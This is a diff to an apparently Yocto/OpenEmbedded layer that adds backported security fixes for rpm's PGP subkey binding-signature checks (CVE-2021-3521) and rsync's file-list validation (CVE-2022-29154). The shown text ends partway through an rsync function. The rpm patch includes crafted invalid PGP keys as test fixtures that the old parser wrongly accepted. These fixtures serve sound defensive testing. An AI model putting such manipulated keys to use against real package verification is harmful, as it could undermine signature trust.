diff --git a/meta/recipes-devtools/rpm/files/CVE-2021-3521-02.patch b/meta/recipes-devtools/rpm/files/CVE-2021-3521-02.patch
new file mode 100644
index 0000000000..c5f88a8c72
--- /dev/null
+++ b/meta/recipes-devtools/rpm/files/CVE-2021-3521-02.patch
@@ -0,0 +1,55 @@
+From 9f03f42e2614a68f589f9db8fe76287146522c0c Mon Sep 17 00:00:00 2001
+From: Panu Matilainen <pmatilai@redhat.com>
+Date: Thu, 30 Sep 2021 09:56:20 +0300
+Subject: [PATCH] Refactor pgpDigParams construction to helper function
+
+No functional changes, just to reduce code duplication and needed by
+the following commits.
+
+Dependent patch:
+CVE: CVE-2021-3521
+Upstream-Status: Backport [https://github.com/rpm-software-management/rpm/commit/9f03f42e2614a68f589f9db8fe76287146522c0c]
+Signed-off-by: Riyaz Khan <Riyaz.Khan@kpit.com>
+
+---
+ rpmio/rpmpgp.c | 13 +++++++++----
+ 1 file changed, 9 insertions(+), 4 deletions(-)
+
+diff --git a/rpmio/rpmpgp.c b/rpmio/rpmpgp.c
+index 340de5fc9a..aad7c275c9 100644
+--- a/rpmio/rpmpgp.c
++++ b/rpmio/rpmpgp.c
+@@ -1055,6 +1055,13 @@ unsigned int pgpDigParamsAlgo(pgpDigParams digp, unsigned int algotype)
+     return algo;
+ }
+ 
++static pgpDigParams pgpDigParamsNew(uint8_t tag)
++{
++    pgpDigParams digp = xcalloc(1, sizeof(*digp));
++    digp->tag = tag;
++    return digp;
++}
++
+ int pgpPrtParams(const uint8_t * pkts, size_t pktlen, unsigned int pkttype,
+ 		 pgpDigParams * ret)
+ {
+@@ -1072,8 +1079,7 @@ int pgpPrtParams(const uint8_t * pkts, size_t pktlen, unsigned int pkttype,
+ 	    if (pkttype && pkt.tag != pkttype) {
+ 		break;
+ 	    } else {
+-		digp = xcalloc(1, sizeof(*digp));
+-		digp->tag = pkt.tag;
++		digp = pgpDigParamsNew(pkt.tag);
+ 	    }
+ 	}
+ 
+@@ -1121,8 +1127,7 @@ int pgpPrtParamsSubkeys(const uint8_t *pkts, size_t pktlen,
+ 		digps = xrealloc(digps, alloced * sizeof(*digps));
+ 	    }
+ 
+-	    digps[count] = xcalloc(1, sizeof(**digps));
+-	    digps[count]->tag = PGPTAG_PUBLIC_SUBKEY;
++	    digps[count] = pgpDigParamsNew(PGPTAG_PUBLIC_SUBKEY);
+ 	    /* Copy UID from main key to subkey */
+ 	    digps[count]->userid = xstrdup(mainkey->userid);
+ 
diff --git a/meta/recipes-devtools/rpm/files/CVE-2021-3521-03.patch b/meta/recipes-devtools/rpm/files/CVE-2021-3521-03.patch
new file mode 100644
index 0000000000..fd31f11beb
--- /dev/null
+++ b/meta/recipes-devtools/rpm/files/CVE-2021-3521-03.patch
@@ -0,0 +1,34 @@
+From 5ff86764b17f31535cb247543a90dd739076ec38 Mon Sep 17 00:00:00 2001
+From: Demi Marie Obenour <demi@invisiblethingslab.com>
+Date: Thu, 6 May 2021 18:34:45 -0400
+Subject: [PATCH] Do not allow extra packets to follow a signature
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+According to RFC 4880 § 11.4, a detached signature is “simply a
+Signature packet�.  Therefore, extra packets following a detached
+signature are not allowed.
+
+Dependent patch:
+CVE: CVE-2021-3521
+Upstream-Status: Backport [https://github.com/rpm-software-management/rpm/commit/5ff86764b17f31535cb247543a90dd739076ec38]
+Signed-off-by: Riyaz Khan <Riyaz.Khan@kpit.com>
+
+---
+ rpmio/rpmpgp.c | 2 ++
+ 1 file changed, 2 insertions(+)
+
+diff --git a/rpmio/rpmpgp.c b/rpmio/rpmpgp.c
+index f1a99e7169..5b346a8253 100644
+--- a/rpmio/rpmpgp.c
++++ b/rpmio/rpmpgp.c
+@@ -1068,6 +1068,8 @@ int pgpPrtParams(const uint8_t * pkts, size_t pktlen, unsigned int pkttype,
+ 	    break;
+ 
+ 	p += (pkt.body - pkt.head) + pkt.blen;
++	if (pkttype == PGPTAG_SIGNATURE)
++	    break;
+     }
+ 
+     rc = (digp && (p == pend)) ? 0 : -1;
diff --git a/meta/recipes-devtools/rpm/files/CVE-2021-3521.patch b/meta/recipes-devtools/rpm/files/CVE-2021-3521.patch
new file mode 100644
index 0000000000..cb9e9842fe
--- /dev/null
+++ b/meta/recipes-devtools/rpm/files/CVE-2021-3521.patch
@@ -0,0 +1,330 @@
+From bd36c5dc9fb6d90c46fbfed8c2d67516fc571ec8 Mon Sep 17 00:00:00 2001
+From: Panu Matilainen <pmatilai@redhat.com>
+Date: Thu, 30 Sep 2021 09:59:30 +0300
+Subject: [PATCH] Validate and require subkey binding signatures on PGP public
+ keys
+
+All subkeys must be followed by a binding signature by the primary key
+as per the OpenPGP RFC, enforce the presence and validity in the parser.
+
+The implementation is as kludgey as they come to work around our
+simple-minded parser structure without touching API, to maximise
+backportability. Store all the raw packets internally as we decode them
+to be able to access previous elements at will, needed to validate ordering
+and access the actual data. Add testcases for manipulated keys whose
+import previously would succeed.
+
+Depends on the two previous commits:
+7b399fcb8f52566e6f3b4327197a85facd08db91 and
+236b802a4aa48711823a191d1b7f753c82a89ec5
+
+CVE: CVE-2021-3521
+Upstream-Status: Backport [https://github.com/rpm-software-management/rpm/commit/bd36c5dc9fb6d90c46fbfed8c2d67516fc571ec8]
+Comment: Hunk refreshed
+Signed-off-by: Riyaz Khan <Riyaz.Khan@kpit.com>
+
+Fixes CVE-2021-3521.
+---
+ rpmio/rpmpgp.c                                | 98 +++++++++++++++++--
+ tests/Makefile.am                             |  3 +
+ tests/data/keys/CVE-2021-3521-badbind.asc     | 25 +++++
+ .../data/keys/CVE-2021-3521-nosubsig-last.asc | 25 +++++
+ tests/data/keys/CVE-2021-3521-nosubsig.asc    | 37 +++++++
+ tests/rpmsigdig.at                            | 28 ++++++
+ 6 files changed, 209 insertions(+), 7 deletions(-)
+ create mode 100644 tests/data/keys/CVE-2021-3521-badbind.asc
+ create mode 100644 tests/data/keys/CVE-2021-3521-nosubsig-last.asc
+ create mode 100644 tests/data/keys/CVE-2021-3521-nosubsig.asc
+
+diff --git a/rpmio/rpmpgp.c b/rpmio/rpmpgp.c
+index aad7c275c9..d70802ae86 100644
+--- a/rpmio/rpmpgp.c
++++ b/rpmio/rpmpgp.c
+@@ -1004,37 +1004,121 @@  static pgpDigParams pgpDigParamsNew(uint8_t tag)
+     return digp;
+ }
+ 
++static int hashKey(DIGEST_CTX hash, const struct pgpPkt *pkt, int exptag)
++{
++    int rc = -1;
++    if (pkt->tag == exptag) {
++	uint8_t head[] = {
++	    0x99,
++	    (pkt->blen >> 8),
++	    (pkt->blen     ),
++	};
++
++	rpmDigestUpdate(hash, head, 3);
++	rpmDigestUpdate(hash, pkt->body, pkt->blen);
++	rc = 0;
++    }
++    return rc;
++}
++
++static int pgpVerifySelf(pgpDigParams key, pgpDigParams selfsig,
++			const struct pgpPkt *all, int i)
++{
++    int rc = -1;
++    DIGEST_CTX hash = NULL;
++
++    switch (selfsig->sigtype) {
++    case PGPSIGTYPE_SUBKEY_BINDING:
++	hash = rpmDigestInit(selfsig->hash_algo, 0);
++	if (hash) {
++	    rc = hashKey(hash, &all[0], PGPTAG_PUBLIC_KEY);
++	    if (!rc)
++		rc = hashKey(hash, &all[i-1], PGPTAG_PUBLIC_SUBKEY);
++	}
++	break;
++    default:
++	/* ignore types we can't handle */
++	rc = 0;
++	break;
++    }
++
++    if (hash && rc == 0)
++	rc = pgpVerifySignature(key, selfsig, hash);
++
++    rpmDigestFinal(hash, NULL, NULL, 0);
++
++    return rc;
++}
++
+ int pgpPrtParams(const uint8_t * pkts, size_t pktlen, unsigned int pkttype,
+ 		 pgpDigParams * ret)
+ {
+     const uint8_t *p = pkts;
+     const uint8_t *pend = pkts + pktlen;
+     pgpDigParams digp = NULL;
+-    struct pgpPkt pkt;
++    pgpDigParams selfsig = NULL;
++    int i = 0;
++    int alloced = 16; /* plenty for normal cases */
++    struct pgpPkt *all = xmalloc(alloced * sizeof(*all));
+     int rc = -1; /* assume failure */
++    int expect = 0;
++    int prevtag = 0;
+ 
+     while (p < pend) {
+-	if (decodePkt(p, (pend - p), &pkt))
++	struct pgpPkt *pkt = &all[i];
++	if (decodePkt(p, (pend - p), pkt))
+ 	    break;
+ 
+ 	if (digp == NULL) {
+-	    if (pkttype && pkt.tag != pkttype) {
++	    if (pkttype && pkt->tag != pkttype) {
+ 		break;
+ 	    } else {
+-		digp = pgpDigParamsNew(pkt.tag);
++		digp = pgpDigParamsNew(pkt->tag);
+ 	    }
+ 	}
+ 
+-	if (pgpPrtPkt(&pkt, digp))
++	if (expect) {
++	    if (pkt->tag != expect)
++		break;
++	    selfsig = pgpDigParamsNew(pkt->tag);
++	}
++
++	if (pgpPrtPkt(pkt, selfsig ? selfsig : digp))
+ 	    break;
+ 
+-	p += (pkt.body - pkt.head) + pkt.blen;
++	if (selfsig) {
++	    /* subkeys must be followed by binding signature */
++	    if (prevtag == PGPTAG_PUBLIC_SUBKEY) {
++		if (selfsig->sigtype != PGPSIGTYPE_SUBKEY_BINDING)
++		    break;
++	    }
++
++	    int xx = pgpVerifySelf(digp, selfsig, all, i);
++
++	    selfsig = pgpDigParamsFree(selfsig);
++	    if (xx)
++		break;
++	    expect = 0;
++	}
++
++	if (pkt->tag == PGPTAG_PUBLIC_SUBKEY)
++	    expect = PGPTAG_SIGNATURE;
++	prevtag = pkt->tag;
++
++	i++;
++	p += (pkt->body - pkt->head) + pkt->blen;
+ 	if (pkttype == PGPTAG_SIGNATURE)
+ 	    break;
++
++	if (alloced <= i) {
++	    alloced *= 2;
++	    all = xrealloc(all, alloced * sizeof(*all));
++	}
+     }
+ 
+-    rc = (digp && (p == pend)) ? 0 : -1;
++    rc = (digp && (p == pend) && expect == 0) ? 0 : -1;
+ 
++    free(all);
+     if (ret && rc == 0) {
+ 	*ret = digp;
+     } else {
+diff --git a/tests/Makefile.am b/tests/Makefile.am
+index b4a2e2e1ce..bc535d2833 100644
+--- a/tests/Makefile.am
++++ b/tests/Makefile.am
+@@ -87,6 +87,9 @@ EXTRA_DIST += data/SPECS/hello-config-buildid.spec
+ EXTRA_DIST += data/SPECS/hello-cd.spec
+ EXTRA_DIST += data/keys/rpm.org-rsa-2048-test.pub
+ EXTRA_DIST += data/keys/rpm.org-rsa-2048-test.secret
++EXTRA_DIST += data/keys/CVE-2021-3521-badbind.asc
++EXTRA_DIST += data/keys/CVE-2021-3521-nosubsig.asc
++EXTRA_DIST += data/keys/CVE-2021-3521-nosubsig-last.asc
+ EXTRA_DIST += data/macros.testfile
+
+ # testsuite voodoo
+diff --git a/tests/data/keys/CVE-2021-3521-badbind.asc b/tests/data/keys/CVE-2021-3521-badbind.asc
+new file mode 100644
+index 0000000000..aea00f9d7a
+--- /dev/null
++++ b/tests/data/keys/CVE-2021-3521-badbind.asc
+@@ -0,0 +1,25 @@
++-----BEGIN PGP PUBLIC KEY BLOCK-----
++Version: rpm-4.17.90 (NSS-3)
++
++mQENBFjmORgBCAC7TMEk6wnjSs8Dr4yqSScWdU2pjcqrkTxuzdWvowcIUPZI0w/g
++HkRqGd4apjvY2V15kjL10gk3QhFP3pZ/9p7zh8o8NHX7aGdSGDK7NOq1eFaErPRY
++91LW9RiZ0lbOjXEzIL0KHxUiTQEmdXJT43DJMFPyW9fkCWg0OltiX618FUdWWfI8
++eySdLur1utnqBvdEbCUvWK2RX3vQZQdvEBODnNk2pxqTyV0w6VPQ96W++lF/5Aas
++7rUv3HIyIXxIggc8FRrnH+y9XvvHDonhTIlGnYZN4ubm9i4y3gOkrZlGTrEw7elQ
++1QeMyG2QQEbze8YjpTm4iLABCBrRfPRaQpwrABEBAAG0IXJwbS5vcmcgUlNBIHRl
++c3RrZXkgPHJzYUBycG0ub3JnPokBNwQTAQgAIQUCWOY5GAIbAwULCQgHAgYVCAkK
++CwIEFgIDAQIeAQIXgAAKCRBDRFkeGWTF/MxxCACnjqFL+MmPh9W9JQKT2DcLbBzf
++Cqo6wcEBoCOcwgRSk8dSikhARoteoa55JRJhuMyeKhhEAogE9HRmCPFdjezFTwgB
++BDVBpO2dZ023mLXDVCYX3S8pShOgCP6Tn4wqCnYeAdLcGg106N4xcmgtcssJE+Pr
++XzTZksbZsrTVEmL/Ym+R5w5jBfFnGk7Yw7ndwfQsfNXQb5AZynClFxnX546lcyZX
++fEx3/e6ezw57WNOUK6WT+8b+EGovPkbetK/rGxNXuWaP6X4A/QUm8O98nCuHYFQq
+++mvNdsCBqGf7mhaRGtpHk/JgCn5rFvArMDqLVrR9hX0LdCSsH7EGE+bR3r7wuQEN
++BFjmORgBCACk+vDZrIXQuFXEYToZVwb2attzbbJJCqD71vmZTLsW0QxuPKRgbcYY
++zp4K4lVBnHhFrF8MOUOxJ7kQWIJZMZFt+BDcptCYurbD2H4W2xvnWViiC+LzCMzz
++iMJT6165uefL4JHTDPxC2fFiM9yrc72LmylJNkM/vepT128J5Qv0gRUaQbHiQuS6
++Dm/+WRnUfx3i89SV4mnBxb/Ta93GVqoOciWwzWSnwEnWYAvOb95JL4U7c5J5f/+c
++KnQDHsW7sIiIdscsWzvgf6qs2Ra1Zrt7Fdk4+ZS2f/adagLhDO1C24sXf5XfMk5m
++L0OGwZSr9m5s17VXxfspgU5ugc8kBJfzABEBAAE=
++=WCfs
++-----END PGP PUBLIC KEY BLOCK-----
++
+diff --git a/tests/data/keys/CVE-2021-3521-nosubsig-last.asc b/tests/data/keys/CVE-2021-3521-nosubsig-last.asc
+new file mode 100644
+index 0000000000..aea00f9d7a
+--- /dev/null
++++ b/tests/data/keys/CVE-2021-3521-nosubsig-last.asc
+@@ -0,0 +1,25 @@
++-----BEGIN PGP PUBLIC KEY BLOCK-----
++Version: rpm-4.17.90 (NSS-3)
++
++mQENBFjmORgBCAC7TMEk6wnjSs8Dr4yqSScWdU2pjcqrkTxuzdWvowcIUPZI0w/g
++HkRqGd4apjvY2V15kjL10gk3QhFP3pZ/9p7zh8o8NHX7aGdSGDK7NOq1eFaErPRY
++91LW9RiZ0lbOjXEzIL0KHxUiTQEmdXJT43DJMFPyW9fkCWg0OltiX618FUdWWfI8
++eySdLur1utnqBvdEbCUvWK2RX3vQZQdvEBODnNk2pxqTyV0w6VPQ96W++lF/5Aas
++7rUv3HIyIXxIggc8FRrnH+y9XvvHDonhTIlGnYZN4ubm9i4y3gOkrZlGTrEw7elQ
++1QeMyG2QQEbze8YjpTm4iLABCBrRfPRaQpwrABEBAAG0IXJwbS5vcmcgUlNBIHRl
++c3RrZXkgPHJzYUBycG0ub3JnPokBNwQTAQgAIQUCWOY5GAIbAwULCQgHAgYVCAkK
++CwIEFgIDAQIeAQIXgAAKCRBDRFkeGWTF/MxxCACnjqFL+MmPh9W9JQKT2DcLbBzf
++Cqo6wcEBoCOcwgRSk8dSikhARoteoa55JRJhuMyeKhhEAogE9HRmCPFdjezFTwgB
++BDVBpO2dZ023mLXDVCYX3S8pShOgCP6Tn4wqCnYeAdLcGg106N4xcmgtcssJE+Pr
++XzTZksbZsrTVEmL/Ym+R5w5jBfFnGk7Yw7ndwfQsfNXQb5AZynClFxnX546lcyZX
++fEx3/e6ezw57WNOUK6WT+8b+EGovPkbetK/rGxNXuWaP6X4A/QUm8O98nCuHYFQq
+++mvNdsCBqGf7mhaRGtpHk/JgCn5rFvArMDqLVrR9hX0LdCSsH7EGE+bR3r7wuQEN
++BFjmORgBCACk+vDZrIXQuFXEYToZVwb2attzbbJJCqD71vmZTLsW0QxuPKRgbcYY
++zp4K4lVBnHhFrF8MOUOxJ7kQWIJZMZFt+BDcptCYurbD2H4W2xvnWViiC+LzCMzz
++iMJT6165uefL4JHTDPxC2fFiM9yrc72LmylJNkM/vepT128J5Qv0gRUaQbHiQuS6
++Dm/+WRnUfx3i89SV4mnBxb/Ta93GVqoOciWwzWSnwEnWYAvOb95JL4U7c5J5f/+c
++KnQDHsW7sIiIdscsWzvgf6qs2Ra1Zrt7Fdk4+ZS2f/adagLhDO1C24sXf5XfMk5m
++L0OGwZSr9m5s17VXxfspgU5ugc8kBJfzABEBAAE=
++=WCfs
++-----END PGP PUBLIC KEY BLOCK-----
++
+diff --git a/tests/data/keys/CVE-2021-3521-nosubsig.asc b/tests/data/keys/CVE-2021-3521-nosubsig.asc
+new file mode 100644
+index 0000000000..3a2e7417f8
+--- /dev/null
++++ b/tests/data/keys/CVE-2021-3521-nosubsig.asc
+@@ -0,0 +1,37 @@
++-----BEGIN PGP PUBLIC KEY BLOCK-----
++Version: rpm-4.17.90 (NSS-3)
++
++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
++E4XX4jtDmdZPreZALsiB
++=rRop
++-----END PGP PUBLIC KEY BLOCK-----
++
+diff --git a/tests/rpmsigdig.at b/tests/rpmsigdig.at
+index 0f8f2b4884..c8b9f139e1 100644
+--- a/tests/rpmsigdig.at
++++ b/tests/rpmsigdig.at
+@@ -240,6 +240,34 @@ gpg(185e6146f00650f8) = 4:185e6146f00650f8-58e63918
+ [])
+ AT_CLEANUP
+ 
++AT_SETUP([rpmkeys --import invalid keys])
++AT_KEYWORDS([rpmkeys import])
++RPMDB_INIT
++
++AT_CHECK([
++runroot rpmkeys --import /data/keys/CVE-2021-3521-badbind.asc
++],
++[1],
++[],
++[error: /data/keys/CVE-2021-3521-badbind.asc: key 1 import failed.]
++)
++AT_CHECK([
++runroot rpmkeys --import /data/keys/CVE-2021-3521-nosubsig.asc
++],
++[1],
++[],
++[error: /data/keys/CVE-2021-3521-nosubsig.asc: key 1 import failed.]
++)
++
++AT_CHECK([
++runroot rpmkeys --import /data/keys/CVE-2021-3521-nosubsig-last.asc
++],
++[1],
++[],
++[error: /data/keys/CVE-2021-3521-nosubsig-last.asc: key 1 import failed.]
++)
++AT_CLEANUP
++
+ # ------------------------------
+ # Test pre-built package verification
+ AT_SETUP([rpmkeys -K <signed> 1])
+
diff --git a/meta/recipes-devtools/rpm/rpm_4.14.2.1.bb b/meta/recipes-devtools/rpm/rpm_4.14.2.1.bb
index 4029217d08..4d605c8501 100644
--- a/meta/recipes-devtools/rpm/rpm_4.14.2.1.bb
+++ b/meta/recipes-devtools/rpm/rpm_4.14.2.1.bb
@@ -24,7 +24,7 @@ HOMEPAGE = "http://www.rpm.org"
 LICENSE = "GPL-2.0"
 LIC_FILES_CHKSUM = "file://COPYING;md5=c0bf017c0fd1920e6158a333acabfd4a"
 
-SRC_URI = "git://github.com/rpm-software-management/rpm;branch=rpm-4.14.x \
+SRC_URI = "git://github.com/rpm-software-management/rpm;branch=rpm-4.14.x;protocol=https \
            file://0001-Do-not-add-an-unsatisfiable-dependency-when-building.patch \
            file://0001-Do-not-read-config-files-from-HOME.patch \
            file://0001-When-cross-installing-execute-package-scriptlets-wit.patch \
@@ -44,6 +44,13 @@ SRC_URI = "git://github.com/rpm-software-management/rpm;branch=rpm-4.14.x \
            file://0001-mono-find-provides-requires-do-not-use-monodis-from-.patch \
            file://0001-Rip-out-partial-support-for-unused-MD2-and-RIPEMD160.patch \
            file://0001-rpmplugins.c-call-dlerror-prior-to-dlsym.patch \
+           file://0001-rpmio-Fix-lzopen_internal-mode-parsing-when-Tn-is-us.patch \
+           file://CVE-2021-3421.patch \
+           file://CVE-2021-20266.patch \
+           file://CVE-2021-3521-01.patch \
+           file://CVE-2021-3521-02.patch \
+           file://CVE-2021-3521-03.patch \
+           file://CVE-2021-3521.patch \
            "
 
 PE = "1"
@@ -60,7 +67,8 @@ export PYTHON_ABI
 # OE-core patches autoreconf to additionally run gnu-configize, which fails with this recipe
 EXTRA_AUTORECONF_append = " --exclude=gnu-configize"
 
-EXTRA_OECONF_append = " --without-lua --enable-python --with-crypto=openssl"
+# Vendor is detected differently on x86 and aarch64 hosts and can feed into target packages
+EXTRA_OECONF_append = " --without-lua --enable-python --with-crypto=openssl --with-vendor=pc"
 EXTRA_OECONF_append_libc-musl = " --disable-nls"
 
 # --sysconfdir prevents rpm from attempting to access machine-specific configuration in sysroot/etc; we need to have it in rootfs
diff --git a/meta/recipes-devtools/rsync/files/0001-Fix-relative-when-copying-an-absolute-path.patch b/meta/recipes-devtools/rsync/files/0001-Fix-relative-when-copying-an-absolute-path.patch
new file mode 100644
index 0000000000..b2e02dba97
--- /dev/null
+++ b/meta/recipes-devtools/rsync/files/0001-Fix-relative-when-copying-an-absolute-path.patch
@@ -0,0 +1,31 @@
+From fabef23bea6e9963c06e218586fda1a823e3c6bf Mon Sep 17 00:00:00 2001
+From: Wayne Davison <wayne@opencoder.net>
+Date: Mon, 8 Aug 2022 21:30:21 -0700
+Subject: [PATCH] Fix --relative when copying an absolute path.
+
+CVE: CVE-2022-29154
+Upstream-Status: Backport [https://github.com/WayneD/rsync/commit/fabef23bea6e9963c06e218586fda1a823e3c6bf]
+Signed-off-by: Matthias Schmitz <matthias.schmitz@port4949.net>
+---
+ exclude.c | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/exclude.c b/exclude.c
+index 2394023f..ba5ca5a3 100644
+--- a/exclude.c
++++ b/exclude.c
+@@ -434,8 +434,10 @@ void add_implied_include(const char *arg)
+ 				*p++ = *cp++;
+ 				break;
+ 			  case '/':
+-				if (p[-1] == '/') /* This is safe because of the initial slash. */
++				if (p[-1] == '/') { /* This is safe because of the initial slash. */
++					cp++;
+ 					break;
++				}
+ 				if (relative_paths) {
+ 					filter_rule const *ent;
+ 					int found = 0;
+-- 
+2.39.2
+
diff --git a/meta/recipes-devtools/rsync/files/CVE-2022-29154.patch b/meta/recipes-devtools/rsync/files/CVE-2022-29154.patch
new file mode 100644
index 0000000000..61e4e03254
--- /dev/null
+++ b/meta/recipes-devtools/rsync/files/CVE-2022-29154.patch
@@ -0,0 +1,334 @@
+From b7231c7d02cfb65d291af74ff66e7d8c507ee871 Mon Sep 17 00:00:00 2001
+From: Wayne Davison <wayne@opencoder.net>
+Date: Sun, 31 Jul 2022 16:55:34 -0700
+Subject: [PATCH] Some extra file-list safety checks.
+
+CVE-2022-29154 rsync: remote arbitrary files write inside the
+
+Upstream-Status: Backport from [https://git.samba.org/?p=rsync.git;a=patch;h=b7231c7d02cfb65d291af74ff66e7d8c507ee871]
+CVE:CVE-2022-29154
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ exclude.c  | 127 ++++++++++++++++++++++++++++++++++++++++++++++++++++-
+ flist.c    |  17 ++++++-
+ io.c       |   4 ++
+ main.c     |   7 ++-
+ receiver.c |  11 +++--
+ 5 files changed, 158 insertions(+), 8 deletions(-)
+
+diff --git a/exclude.c b/exclude.c
+index 7989fb3..e146e96 100644
+--- a/exclude.c
++++ b/exclude.c
+@@ -26,16 +26,21 @@ extern int am_server;
+ extern int am_sender;
+ extern int eol_nulls;
+ extern int io_error;
++extern int xfer_dirs;
++extern int recurse;
+ extern int local_server;
+ extern int prune_empty_dirs;
+ extern int ignore_perishable;
++extern int relative_paths;
+ extern int delete_mode;
+ extern int delete_excluded;
+ extern int cvs_exclude;
+ extern int sanitize_paths;
+ extern int protocol_version;
++extern int list_only;
+ extern int module_id;
+ 
++extern char *filesfrom_host;
+ extern char curr_dir[MAXPATHLEN];
+ extern unsigned int curr_dir_len;
+ extern unsigned int module_dirlen;
+@@ -43,8 +48,10 @@ extern unsigned int module_dirlen;
+ filter_rule_list filter_list = { .debug_type = "" };
+ filter_rule_list cvs_filter_list = { .debug_type = " [global CVS]" };
+ filter_rule_list daemon_filter_list = { .debug_type = " [daemon]" };
++filter_rule_list implied_filter_list = { .debug_type = " [implied]" };
+ 
+ int saw_xattr_filter = 0;
++int trust_sender_filter = 0;
+ 
+ /* Need room enough for ":MODS " prefix plus some room to grow. */
+ #define MAX_RULE_PREFIX (16)
+@@ -293,6 +300,123 @@ static void add_rule(filter_rule_list *listp, const char *pat, unsigned int pat_
+ 	}
+ }
+ 
++/* Each arg the client sends to the remote sender turns into an implied include
++ * that the receiver uses to validate the file list from the sender. */
++void add_implied_include(const char *arg)
++{
++	filter_rule *rule;
++	int arg_len, saw_wild = 0, backslash_cnt = 0;
++	int slash_cnt = 1; /* We know we're adding a leading slash. */
++	const char *cp;
++	char *p;
++	if (relative_paths) {
++		cp = strstr(arg, "/./");
++		if (cp)
++			arg = cp+3;
++	} else {
++		if ((cp = strrchr(arg, '/')) != NULL)
++			arg = cp + 1;
++	}
++	arg_len = strlen(arg);
++	if (arg_len) {
++		if (strpbrk(arg, "*[?")) {
++			/* We need to add room to escape backslashes if wildcard chars are present. */
++			cp = arg;
++			while ((cp = strchr(cp, '\\')) != NULL) {
++				arg_len++;
++				cp++;
++			}
++			saw_wild = 1;
++		}
++		arg_len++; /* Leave room for the prefixed slash */
++		rule = new0(filter_rule);
++		if (!implied_filter_list.head)
++			implied_filter_list.head = implied_filter_list.tail = rule;
++		else {
++			rule->next = implied_filter_list.head;
++			implied_filter_list.head = rule;
++		}
++		rule->rflags = FILTRULE_INCLUDE + (saw_wild ? FILTRULE_WILD : 0);
++		p = rule->pattern = new_array(char, arg_len + 1);
++		*p++ = '/';
++		cp = arg;
++		while (*cp) {
++			switch (*cp) {
++			  case '\\':
++				backslash_cnt++;
++				if (saw_wild)
++					*p++ = '\\';
++				*p++ = *cp++;
++				break;
++			  case '/':
++				if (p[-1] == '/') /* This is safe because of the initial slash. */
++					break;
++				if (relative_paths) {
++					filter_rule const *ent;
++					int found = 0;
++					*p = '\0';
++					for (ent = implied_filter_list.head; ent; ent = ent->next) {
++						if (ent != rule && strcmp(ent->pattern, rule->pattern) == 0)
++							found = 1;
++					}
++					if (!found) {
++						filter_rule *R_rule = new0(filter_rule);
++						R_rule->rflags = FILTRULE_INCLUDE + (saw_wild ? FILTRULE_WILD : 0);
++						R_rule->pattern = strdup(rule->pattern);
++						R_rule->u.slash_cnt = slash_cnt;
++						R_rule->next = implied_filter_list.head;
++						implied_filter_list.head = R_rule;
++					}
++				}
++				slash_cnt++;
++				*p++ = *cp++;
++				break;
++			  default:
++				*p++ = *cp++;
++				break;
